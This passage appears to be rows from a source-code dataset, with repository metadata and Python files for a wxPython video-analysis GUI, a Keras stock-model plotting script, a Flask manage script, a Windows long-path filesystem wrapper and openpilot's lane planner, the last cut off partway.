if self.personTab is None:
tab_title = "Person Panel"
person_controller = PersonController()
personTab = PersonPanel(self.panel_notebook, self, tab_title, person_controller)
idx = self.panel_notebook.AddPage(personTab, tab_title)
self.personTab = personTab
else:
self.personTab.onCloseTab(event)
def onCloseTab(self, event):
self.delPage("Record Screening")
self.Layout()
def onCloseAnalyserTab(self, event):
self.onStopProcess(event)
self.delPage("Analyse Sample")
self.Layout()
def onRecord(self, event, form):
sys = RecordSystem()
msys = MovieController()
msys.read_files()
person = form.txtPerson.GetValue()
movie_path = form.txtMovieFile.GetValue()
mdata = msys.getMovieByFile(movie_path)
file_name = msys.get_dir() + msys.getMovieObjById(mdata['id']).filename
data = {"movie_id": "%s"%(mdata["id"]),"subject_name": person}
player = VLCPlayer(file_name)
sys = RecordSystem()
filename = sys.createSampleDir()
sys.saveMetaData(filename, data)
sys.start_recording("sample", player, False, filename)
self.print("Record complete...")
self.print("New sample created. sample_id= %s"%(filename))
def onSampleMenu(self, event):
if self.recordTab is not None:
self.recordTab.Close()
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
sampleFrame = SampleTabFrame(controllers)
sampleFrame.Show()
self.Layout()
def onCaptureTestButton(self, event):
self.print("Camera Capture event started.")
captureFrame = CameraCaptureFrame()
captureFrame.Show()
self.Layout()
def onAnalyseMenu(self, event):
with wx.FileDialog(self, "Open a sample file", wildcard="avi files (*.avi)|*.avi",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
_sid = pathname[:pathname.rindex("/")]
_sid = _sid[_sid.rindex("/")+1:]
analyseTab = AnalyseMovieTabPanel(self.panel_notebook, self, _sid)
self.panel_notebook.AddPage(analyseTab, "Analyse Sample")
self.Layout()
def onAnalyse(self, event, sid, form):
from multiprocessing import Process
fer = form.chkFER.GetValue()
head = form.chkBEGR.GetValue()
body = False
preview = form.chkPreview.GetValue()
video_file_name = "./data/"+sid+ "/test.avi"
video_dir = "./data/"+sid+"/"
if not preview:
p = Process(name='process',
target=analyse_func,
args=(video_dir, video_file_name,
fer,head,body,preview,self.print,) )
p.start()
else:
analyse_func(video_dir, video_file_name,
fer,head,body,preview,self.print)
self.analyse_process = p if not preview else None
def onStopProcess(self, event):
if self.analyse_process is not None:
self.analyse_process.terminate()
def delPage(self, pageTitle):
for index in range(self.panel_notebook.GetPageCount()):
if self.panel_notebook.GetPageText(index) == pageTitle:
self.panel_notebook.DeletePage(index)
self.panel_notebook.SendSizeEvent()
break
| true
| true
|
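onAnalyse and onStopProcess in the handler above hold a multiprocessing.Process handle so the UI can cancel a long-running analysis; a minimal standalone sketch of that pattern (toy worker, not the repository's analyse_func):

# Toy start/terminate pattern; the worker here is a stand-in for analyse_func.
import time
from multiprocessing import Process

def toy_worker(label):
    while True:
        print("analysing %s ..." % label)
        time.sleep(1)

if __name__ == '__main__':
    p = Process(target=toy_worker, args=("sample",))
    p.start()               # analysis runs in the background, UI stays responsive
    time.sleep(3)
    p.terminate()           # same call used by onStopProcess
    p.join()                # reap the terminated child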
1c422e8a6aafaa91932fb0b8728d242ea83b1153
| 3,879
|
py
|
Python
|
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | 1
|
2019-06-13T03:13:55.000Z
|
2019-06-13T03:13:55.000Z
|
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | null | null | null |
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# MIT License
# Copyright (c) 2018 Andrew J. Bean
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model
def main():
Gain = '0.5'
Loss = '0.5'
MSE_Loss = False
LinearActivation = False
DropFrac = '0.0'
NEpochs = '200'
NameRoot = 'my_model_'
whichplot = 1
extension = Gain+','+Loss +'_open'
ExamplesFile = h5py.File("2min_examples_"+extension+".hdf5", "r")
# ExamplesFile = h5py.File("2min_aggregated_examples_"+extension+".hdf5", "r")
SaveName = NameRoot+extension
if MSE_Loss:
SaveName = SaveName + '_MSE'
if LinearActivation:
SaveName = SaveName + '_Lin'
if DropFrac!='0.7':
SaveName = SaveName + '_' + DropFrac
# SaveName = 'Trained/' + SaveName + "_"+NEpochs+"_"+val_loss+".h5"
SaveName = 'Trained/' + SaveName + "_"+NEpochs+".h5"
print(SaveName)
model = load_model(SaveName)
print(extension)
if MSE_Loss:
print('using mean_squared_error loss')
else:
print('using binary_crossentropy loss')
print(ExamplesFile['Features'].shape)
print(ExamplesFile['Outcomes'].shape)
print(ExamplesFile['Timestamps'].shape)
NumExamples = ExamplesFile['Features'].shape[0]
FeatureSize = ExamplesFile['Features'].shape[1]
SampleShift = 0.0
StartTest = int((0.9 - SampleShift )*NumExamples)
EndTest = int((1.0 - SampleShift )*NumExamples)
print('reading data from HDF5...')
# x_train = ExamplesFile['Features'][:StartTest]
# y_train = ExamplesFile['Outcomes'][:StartTest]
x_test = ExamplesFile['Features'][StartTest:EndTest]
y_test = ExamplesFile['Outcomes'][StartTest:EndTest]
t_test = ExamplesFile['Timestamps'][StartTest:EndTest]
y_predict = model.predict_on_batch(x_test)
y_predict = np.array([y_predict[i][0] for i in range(len(y_predict))])
Rearrange = y_predict.argsort()
# flip so losses are at right of plot
# don't flip to keep losses at the left
# Rearrange = np.flip(Rearrange,0)
y_predict = y_predict[Rearrange]
y_test = y_test[Rearrange]
t_test = t_test[Rearrange]
y_test = y_test*(float(Gain)+float(Loss))/100.0 - float(Loss)/100.0 + 1.0
if whichplot==0:
y_test = np.log(y_test)
y_test = np.cumsum(y_test)
for i in range(len(y_test)):
y_test[i] = y_test[i]/(i+1.0)
plt.plot(np.exp(y_test)*100-100)
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.show()
elif whichplot==1:
NWindow = 100
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.plot(np.convolve(y_test*100-100,np.ones(NWindow)/NWindow,mode='same'))
plt.plot(y_predict)
plt.show()
if __name__ == '__main__':
main()
| 34.327434
| 82
| 0.67801
|
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model
def main():
Gain = '0.5'
Loss = '0.5'
MSE_Loss = False
LinearActivation = False
DropFrac = '0.0'
NEpochs = '200'
NameRoot = 'my_model_'
whichplot = 1
extension = Gain+','+Loss +'_open'
ExamplesFile = h5py.File("2min_examples_"+extension+".hdf5", "r")
SaveName = NameRoot+extension
if MSE_Loss:
SaveName = SaveName + '_MSE'
if LinearActivation:
SaveName = SaveName + '_Lin'
if DropFrac!='0.7':
SaveName = SaveName + '_' + DropFrac
SaveName = 'Trained/' + SaveName + "_"+NEpochs+".h5"
print(SaveName)
model = load_model(SaveName)
print(extension)
if MSE_Loss:
print('using mean_squared_error loss')
else:
print('using binary_crossentropy loss')
print(ExamplesFile['Features'].shape)
print(ExamplesFile['Outcomes'].shape)
print(ExamplesFile['Timestamps'].shape)
NumExamples = ExamplesFile['Features'].shape[0]
FeatureSize = ExamplesFile['Features'].shape[1]
SampleShift = 0.0
StartTest = int((0.9 - SampleShift )*NumExamples)
EndTest = int((1.0 - SampleShift )*NumExamples)
print('reading data from HDF5...')
x_test = ExamplesFile['Features'][StartTest:EndTest]
y_test = ExamplesFile['Outcomes'][StartTest:EndTest]
t_test = ExamplesFile['Timestamps'][StartTest:EndTest]
y_predict = model.predict_on_batch(x_test)
y_predict = np.array([y_predict[i][0] for i in range(len(y_predict))])
Rearrange = y_predict.argsort()
# Rearrange = np.flip(Rearrange,0)
y_predict = y_predict[Rearrange]
y_test = y_test[Rearrange]
t_test = t_test[Rearrange]
y_test = y_test*(float(Gain)+float(Loss))/100.0 - float(Loss)/100.0 + 1.0
if whichplot==0:
y_test = np.log(y_test)
y_test = np.cumsum(y_test)
for i in range(len(y_test)):
y_test[i] = y_test[i]/(i+1.0)
plt.plot(np.exp(y_test)*100-100)
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.show()
elif whichplot==1:
NWindow = 100
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.plot(np.convolve(y_test*100-100,np.ones(NWindow)/NWindow,mode='same'))
plt.plot(y_predict)
plt.show()
if __name__ == '__main__':
main()
| true
| true
|
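The whichplot == 1 branch above smooths outcomes with np.convolve; a tiny toy example makes the box-kernel moving average explicit:

# Running mean via a normalised box kernel, as in the plotting branch above.
import numpy as np

y = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
window = 3
smoothed = np.convolve(y, np.ones(window) / window, mode='same')
print(smoothed)   # [1. 2. 3. 4. 3.] -- edges are biased by the implicit zero padding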
1c422ef9036dbb792a8e97dffa85983051952d08
| 1,251
|
py
|
Python
|
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | 3
|
2018-07-27T01:49:13.000Z
|
2018-08-20T01:57:06.000Z
|
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import os
from flask_script import Manager, Shell, Server
from flask_script.commands import ShowUrls, Clean
from strabo.app import create_app
from strabo.models import db, User
# default to dev config
env = os.environ.get('STRABO_ENV', 'dev')
app = create_app('strabo.settings.%sConfig' % env.capitalize())
HERE = os.path.abspath(os.path.dirname(__file__))
TEST_PATH = os.path.join(HERE, 'tests')
manager = Manager(app)
def _make_context():
"""Return context dict for a shell session so you can access
app, db, and the User model by default.
"""
return {'app': app, 'db': db, 'User': User}
@manager.command
def test():
"""Run the tests."""
import pytest
exit_code = pytest.main([TEST_PATH, '--verbose'])
return exit_code
@manager.command
def createdb():
""" Creates a database with all of the tables defined in
your SQLAlchemy models
"""
db.create_all()
manager.add_command("server", Server())
manager.add_command("urls", ShowUrls())
manager.add_command("clean", Clean())
# Creates a python REPL with several default imports in the context of the app
manager.add_command('shell', Shell(make_context=_make_context))
if __name__ == "__main__":
manager.run()
| 24.529412
| 78
| 0.704237
|
import os
from flask_script import Manager, Shell, Server
from flask_script.commands import ShowUrls, Clean
from strabo.app import create_app
from strabo.models import db, User
env = os.environ.get('STRABO_ENV', 'dev')
app = create_app('strabo.settings.%sConfig' % env.capitalize())
HERE = os.path.abspath(os.path.dirname(__file__))
TEST_PATH = os.path.join(HERE, 'tests')
manager = Manager(app)
def _make_context():
return {'app': app, 'db': db, 'User': User}
@manager.command
def test():
import pytest
exit_code = pytest.main([TEST_PATH, '--verbose'])
return exit_code
@manager.command
def createdb():
db.create_all()
manager.add_command("server", Server())
manager.add_command("urls", ShowUrls())
manager.add_command("clean", Clean())
manager.add_command('shell', Shell(make_context=_make_context))
if __name__ == "__main__":
manager.run()
| true
| true
|
1c422fb7fbcdd11294596298fce6ebce66e1b612
| 4,639
|
py
|
Python
|
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Wraps os, os.path and shutil functions to work around MAX_PATH on Windows."""
import __builtin__
import inspect
import os
import shutil
import sys
if sys.platform == 'win32':
import ctypes
GetFileAttributesW = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributesW.argtypes = (ctypes.c_wchar_p,)
GetFileAttributesW.restype = ctypes.c_uint
CreateSymbolicLinkW = ctypes.windll.kernel32.CreateSymbolicLinkW
CreateSymbolicLinkW.argtypes = (
ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
CreateSymbolicLinkW.restype = ctypes.c_ubyte
def extend(path):
"""Adds '\\\\?\\' when given an absolute path so the MAX_PATH (260) limit is
not enforced.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
return path if path.startswith(prefix) else prefix + path
def trim(path):
"""Removes '\\\\?\\' when receiving a path."""
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
if path.startswith(prefix):
path = path[len(prefix):]
assert os.path.isabs(path), path
return path
def islink(path):
"""Proper implementation of islink() for Windows.
The stdlib is broken.
https://msdn.microsoft.com/library/windows/desktop/aa365682.aspx
"""
FILE_ATTRIBUTE_REPARSE_POINT = 1024
return bool(GetFileAttributesW(extend(path)) & FILE_ATTRIBUTE_REPARSE_POINT)
def symlink(source, link_name):
"""Creates a symlink on Windows 7 and later.
This function will only work once SeCreateSymbolicLinkPrivilege has been
enabled. See file_path.enable_symlink().
Useful material:
CreateSymbolicLinkW:
https://msdn.microsoft.com/library/windows/desktop/aa363866.aspx
UAC and privilege stripping:
https://msdn.microsoft.com/library/bb530410.aspx
Privilege constants:
https://msdn.microsoft.com/library/windows/desktop/bb530716.aspx
"""
# TODO(maruel): This forces always creating absolute path symlinks.
source = extend(source)
flags = 1 if os.path.isdir(source) else 0
if not CreateSymbolicLinkW(extend(link_name), source, flags):
raise WindowsError() # pylint: disable=undefined-variable
def walk(top, *args, **kwargs):
return os.walk(extend(top), *args, **kwargs)
else:
def extend(path):
"""Convert the path back to utf-8.
In some rare case, concatenating str and unicode may cause a
UnicodeEncodeError because the default encoding is 'ascii'.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
return path.encode('utf-8')
def trim(path):
"""Path mangling is not needed on POSIX."""
assert os.path.isabs(path), path
assert isinstance(path, str), path
return path.decode('utf-8')
def islink(path):
return os.path.islink(extend(path))
def symlink(source, link_name):
return os.symlink(source, extend(link_name))
def walk(top, *args, **kwargs):
for root, dirs, files in os.walk(extend(top), *args, **kwargs):
yield trim(root), dirs, files
## builtin
def open(path, *args, **kwargs): # pylint: disable=redefined-builtin
return __builtin__.open(extend(path), *args, **kwargs)
## os
def link(source, link_name):
return os.link(extend(source), extend(link_name))
def rename(old, new):
return os.rename(extend(old), extend(new))
def renames(old, new):
return os.renames(extend(old), extend(new))
## shutil
def copy2(src, dst):
return shutil.copy2(extend(src), extend(dst))
def rmtree(path, *args, **kwargs):
return shutil.rmtree(extend(path), *args, **kwargs)
## The rest
def _get_lambda(func):
return lambda path, *args, **kwargs: func(extend(path), *args, **kwargs)
def _is_path_fn(func):
return (inspect.getargspec(func)[0] or [None])[0] == 'path'
_os_fns = (
'access', 'chdir', 'chflags', 'chroot', 'chmod', 'chown', 'lchflags',
'lchmod', 'lchown', 'listdir', 'lstat', 'mknod', 'mkdir', 'makedirs',
'remove', 'removedirs', 'rmdir', 'stat', 'statvfs', 'unlink', 'utime')
_os_path_fns = (
'exists', 'lexists', 'getatime', 'getmtime', 'getctime', 'getsize', 'isfile',
'isdir', 'ismount')
for _fn in _os_fns:
if hasattr(os, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os, _fn)))
for _fn in _os_path_fns:
if hasattr(os.path, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os.path, _fn)))
| 25.772222
| 80
| 0.686786
|
import __builtin__
import inspect
import os
import shutil
import sys
if sys.platform == 'win32':
import ctypes
GetFileAttributesW = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributesW.argtypes = (ctypes.c_wchar_p,)
GetFileAttributesW.restype = ctypes.c_uint
CreateSymbolicLinkW = ctypes.windll.kernel32.CreateSymbolicLinkW
CreateSymbolicLinkW.argtypes = (
ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
CreateSymbolicLinkW.restype = ctypes.c_ubyte
def extend(path):
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
return path if path.startswith(prefix) else prefix + path
def trim(path):
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
if path.startswith(prefix):
path = path[len(prefix):]
assert os.path.isabs(path), path
return path
def islink(path):
FILE_ATTRIBUTE_REPARSE_POINT = 1024
return bool(GetFileAttributesW(extend(path)) & FILE_ATTRIBUTE_REPARSE_POINT)
def symlink(source, link_name):
source = extend(source)
flags = 1 if os.path.isdir(source) else 0
if not CreateSymbolicLinkW(extend(link_name), source, flags):
raise WindowsError()
def walk(top, *args, **kwargs):
return os.walk(extend(top), *args, **kwargs)
else:
def extend(path):
"""Convert the path back to utf-8.
In some rare case, concatenating str and unicode may cause a
UnicodeEncodeError because the default encoding is 'ascii'.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
return path.encode('utf-8')
def trim(path):
"""Path mangling is not needed on POSIX."""
assert os.path.isabs(path), path
assert isinstance(path, str), path
return path.decode('utf-8')
def islink(path):
return os.path.islink(extend(path))
def symlink(source, link_name):
return os.symlink(source, extend(link_name))
def walk(top, *args, **kwargs):
for root, dirs, files in os.walk(extend(top), *args, **kwargs):
yield trim(root), dirs, files
def open(path, *args, **kwargs):
return __builtin__.open(extend(path), *args, **kwargs)
def link(source, link_name):
return os.link(extend(source), extend(link_name))
def rename(old, new):
return os.rename(extend(old), extend(new))
def renames(old, new):
return os.renames(extend(old), extend(new))
def copy2(src, dst):
return shutil.copy2(extend(src), extend(dst))
def rmtree(path, *args, **kwargs):
return shutil.rmtree(extend(path), *args, **kwargs)
def _get_lambda(func):
return lambda path, *args, **kwargs: func(extend(path), *args, **kwargs)
def _is_path_fn(func):
return (inspect.getargspec(func)[0] or [None])[0] == 'path'
_os_fns = (
'access', 'chdir', 'chflags', 'chroot', 'chmod', 'chown', 'lchflags',
'lchmod', 'lchown', 'listdir', 'lstat', 'mknod', 'mkdir', 'makedirs',
'remove', 'removedirs', 'rmdir', 'stat', 'statvfs', 'unlink', 'utime')
_os_path_fns = (
'exists', 'lexists', 'getatime', 'getmtime', 'getctime', 'getsize', 'isfile',
'isdir', 'ismount')
for _fn in _os_fns:
if hasattr(os, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os, _fn)))
for _fn in _os_path_fns:
if hasattr(os.path, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os.path, _fn)))
| true
| true
|
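fs.py above targets Python 2 (__builtin__, unicode); a hypothetical usage sketch under that assumption — every wrapped call goes through extend(), which adds the \\?\ long-path prefix on Windows and UTF-8-encodes the path on POSIX:

# Hypothetical Python 2 usage of the wrapper module; paths must be absolute
# unicode strings.
import fs

path = u'/tmp/example.txt'
with fs.open(path, 'wb') as f:      # wrapped __builtin__.open
    f.write('data')
print(fs.isfile(path))              # generated via _get_lambda from os.path.isfile
fs.remove(path)                     # generated via _get_lambda from os.remove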
1c4231dd19d810e39685a4bcc81a1b4b6addc51b
| 4,994
|
py
|
Python
|
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
import numpy as np
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp, clip, mean
from common.realtime import DT_MDL
from selfdrive.hardware import EON, TICI
from selfdrive.swaglog import cloudlog
from selfdrive.ntune import ntune_common_get
ENABLE_ZORROBYTE = True
ENABLE_INC_LANE_PROB = True
TRAJECTORY_SIZE = 33
# camera offset is meters from center car to camera
if EON:
CAMERA_OFFSET = ntune_common_get("cameraOffset")
PATH_OFFSET = 0.0
elif TICI:
CAMERA_OFFSET = -0.04
PATH_OFFSET = -0.04
else:
CAMERA_OFFSET = 0.0
PATH_OFFSET = 0.0
class LanePlanner:
def __init__(self, wide_camera=False):
self.ll_t = np.zeros((TRAJECTORY_SIZE,))
self.ll_x = np.zeros((TRAJECTORY_SIZE,))
self.lll_y = np.zeros((TRAJECTORY_SIZE,))
self.rll_y = np.zeros((TRAJECTORY_SIZE,))
self.lane_width_estimate = FirstOrderFilter(3.7, 9.95, DT_MDL)
self.lane_width_certainty = FirstOrderFilter(1.0, 0.95, DT_MDL)
self.lane_width = 3.7
self.lll_prob = 0.
self.rll_prob = 0.
self.d_prob = 0.
self.lll_std = 0.
self.rll_std = 0.
self.l_lane_change_prob = 0.
self.r_lane_change_prob = 0.
self.camera_offset = -CAMERA_OFFSET if wide_camera else CAMERA_OFFSET
self.path_offset = -PATH_OFFSET if wide_camera else PATH_OFFSET
self.readings = []
self.frame = 0
self.wide_camera = wide_camera
def parse_model(self, md):
lane_lines = md.laneLines
if len(lane_lines) == 4 and len(lane_lines[0].t) == TRAJECTORY_SIZE:
self.ll_t = (np.array(lane_lines[1].t) + np.array(lane_lines[2].t))/2
# left and right ll x is the same
self.ll_x = lane_lines[1].x
# only offset left and right lane lines; offsetting path does not make sense
cameraOffset = ntune_common_get("cameraOffset") + 0.08 if self.wide_camera else ntune_common_get("cameraOffset")
self.lll_y = np.array(lane_lines[1].y) - cameraOffset
self.rll_y = np.array(lane_lines[2].y) - cameraOffset
self.lll_prob = md.laneLineProbs[1]
self.rll_prob = md.laneLineProbs[2]
self.lll_std = md.laneLineStds[1]
self.rll_std = md.laneLineStds[2]
desire_state = md.meta.desireState
if len(desire_state):
self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft]
self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight]
def get_d_path(self, v_ego, path_t, path_xyz):
# Reduce reliance on lanelines that are too far apart or
# will be in a few seconds
path_xyz[:, 1] -= self.path_offset
l_prob, r_prob = self.lll_prob, self.rll_prob
width_pts = self.rll_y - self.lll_y
prob_mods = []
for t_check in [0.0, 1.5, 3.0]:
width_at_t = interp(t_check * (v_ego + 7), self.ll_x, width_pts)
prob_mods.append(interp(width_at_t, [4.0, 5.0], [1.0, 0.0]))
mod = min(prob_mods)
l_prob *= mod
r_prob *= mod
# Reduce reliance on uncertain lanelines
l_std_mod = interp(self.lll_std, [.15, .3], [1.0, 0.0])
r_std_mod = interp(self.rll_std, [.15, .3], [1.0, 0.0])
l_prob *= l_std_mod
r_prob *= r_std_mod
if ENABLE_ZORROBYTE:
# zorrobyte code
if l_prob > 0.5 and r_prob > 0.5:
self.frame += 1
if self.frame > 20:
self.frame = 0
current_lane_width = clip(abs(self.rll_y[0] - self.lll_y[0]), 2.5, 3.5)
self.readings.append(current_lane_width)
self.lane_width = mean(self.readings)
if len(self.readings) >= 30:
self.readings.pop(0)
# zorrobyte
# Don't exit dive
if abs(self.rll_y[0] - self.lll_y[0]) > self.lane_width:
r_prob = r_prob / interp(l_prob, [0, 1], [1, 3])
else:
# Find current lanewidth
self.lane_width_certainty.update(l_prob * r_prob)
current_lane_width = abs(self.rll_y[0] - self.lll_y[0])
self.lane_width_estimate.update(current_lane_width)
speed_lane_width = interp(v_ego, [0., 31.], [2.8, 3.5])
self.lane_width = self.lane_width_certainty.x * self.lane_width_estimate.x + \
(1 - self.lane_width_certainty.x) * speed_lane_width
clipped_lane_width = min(4.0, self.lane_width)
path_from_left_lane = self.lll_y + clipped_lane_width / 2.0
path_from_right_lane = self.rll_y - clipped_lane_width / 2.0
self.d_prob = l_prob + r_prob - l_prob * r_prob
# neokii
if ENABLE_INC_LANE_PROB and self.d_prob > 0.65:
self.d_prob = min(self.d_prob * 1.3, 1.0)
lane_path_y = (l_prob * path_from_left_lane + r_prob * path_from_right_lane) / (l_prob + r_prob + 0.0001)
safe_idxs = np.isfinite(self.ll_t)
if safe_idxs[0]:
lane_path_y_interp = np.interp(path_t, self.ll_t[safe_idxs], lane_path_y[safe_idxs])
path_xyz[:,1] = self.d_prob * lane_path_y_interp + (1.0 - self.d_prob) * path_xyz[:,1]
else:
cloudlog.warning("Lateral mpc - NaNs in laneline times, ignoring")
return path_xyz
| 35.671429
| 118
| 0.676812
|
import numpy as np
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp, clip, mean
from common.realtime import DT_MDL
from selfdrive.hardware import EON, TICI
from selfdrive.swaglog import cloudlog
from selfdrive.ntune import ntune_common_get
ENABLE_ZORROBYTE = True
ENABLE_INC_LANE_PROB = True
TRAJECTORY_SIZE = 33
if EON:
CAMERA_OFFSET = ntune_common_get("cameraOffset")
PATH_OFFSET = 0.0
elif TICI:
CAMERA_OFFSET = -0.04
PATH_OFFSET = -0.04
else:
CAMERA_OFFSET = 0.0
PATH_OFFSET = 0.0
class LanePlanner:
def __init__(self, wide_camera=False):
self.ll_t = np.zeros((TRAJECTORY_SIZE,))
self.ll_x = np.zeros((TRAJECTORY_SIZE,))
self.lll_y = np.zeros((TRAJECTORY_SIZE,))
self.rll_y = np.zeros((TRAJECTORY_SIZE,))
self.lane_width_estimate = FirstOrderFilter(3.7, 9.95, DT_MDL)
self.lane_width_certainty = FirstOrderFilter(1.0, 0.95, DT_MDL)
self.lane_width = 3.7
self.lll_prob = 0.
self.rll_prob = 0.
self.d_prob = 0.
self.lll_std = 0.
self.rll_std = 0.
self.l_lane_change_prob = 0.
self.r_lane_change_prob = 0.
self.camera_offset = -CAMERA_OFFSET if wide_camera else CAMERA_OFFSET
self.path_offset = -PATH_OFFSET if wide_camera else PATH_OFFSET
self.readings = []
self.frame = 0
self.wide_camera = wide_camera
def parse_model(self, md):
lane_lines = md.laneLines
if len(lane_lines) == 4 and len(lane_lines[0].t) == TRAJECTORY_SIZE:
self.ll_t = (np.array(lane_lines[1].t) + np.array(lane_lines[2].t))/2
self.ll_x = lane_lines[1].x
cameraOffset = ntune_common_get("cameraOffset") + 0.08 if self.wide_camera else ntune_common_get("cameraOffset")
self.lll_y = np.array(lane_lines[1].y) - cameraOffset
self.rll_y = np.array(lane_lines[2].y) - cameraOffset
self.lll_prob = md.laneLineProbs[1]
self.rll_prob = md.laneLineProbs[2]
self.lll_std = md.laneLineStds[1]
self.rll_std = md.laneLineStds[2]
desire_state = md.meta.desireState
if len(desire_state):
self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft]
self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight]
def get_d_path(self, v_ego, path_t, path_xyz):
path_xyz[:, 1] -= self.path_offset
l_prob, r_prob = self.lll_prob, self.rll_prob
width_pts = self.rll_y - self.lll_y
prob_mods = []
for t_check in [0.0, 1.5, 3.0]:
width_at_t = interp(t_check * (v_ego + 7), self.ll_x, width_pts)
prob_mods.append(interp(width_at_t, [4.0, 5.0], [1.0, 0.0]))
mod = min(prob_mods)
l_prob *= mod
r_prob *= mod
l_std_mod = interp(self.lll_std, [.15, .3], [1.0, 0.0])
r_std_mod = interp(self.rll_std, [.15, .3], [1.0, 0.0])
l_prob *= l_std_mod
r_prob *= r_std_mod
if ENABLE_ZORROBYTE:
if l_prob > 0.5 and r_prob > 0.5:
self.frame += 1
if self.frame > 20:
self.frame = 0
current_lane_width = clip(abs(self.rll_y[0] - self.lll_y[0]), 2.5, 3.5)
self.readings.append(current_lane_width)
self.lane_width = mean(self.readings)
if len(self.readings) >= 30:
self.readings.pop(0)
if abs(self.rll_y[0] - self.lll_y[0]) > self.lane_width:
r_prob = r_prob / interp(l_prob, [0, 1], [1, 3])
else:
# Find current lanewidth
self.lane_width_certainty.update(l_prob * r_prob)
current_lane_width = abs(self.rll_y[0] - self.lll_y[0])
self.lane_width_estimate.update(current_lane_width)
speed_lane_width = interp(v_ego, [0., 31.], [2.8, 3.5])
self.lane_width = self.lane_width_certainty.x * self.lane_width_estimate.x + \
(1 - self.lane_width_certainty.x) * speed_lane_width
clipped_lane_width = min(4.0, self.lane_width)
path_from_left_lane = self.lll_y + clipped_lane_width / 2.0
path_from_right_lane = self.rll_y - clipped_lane_width / 2.0
self.d_prob = l_prob + r_prob - l_prob * r_prob
# neokii
if ENABLE_INC_LANE_PROB and self.d_prob > 0.65:
self.d_prob = min(self.d_prob * 1.3, 1.0)
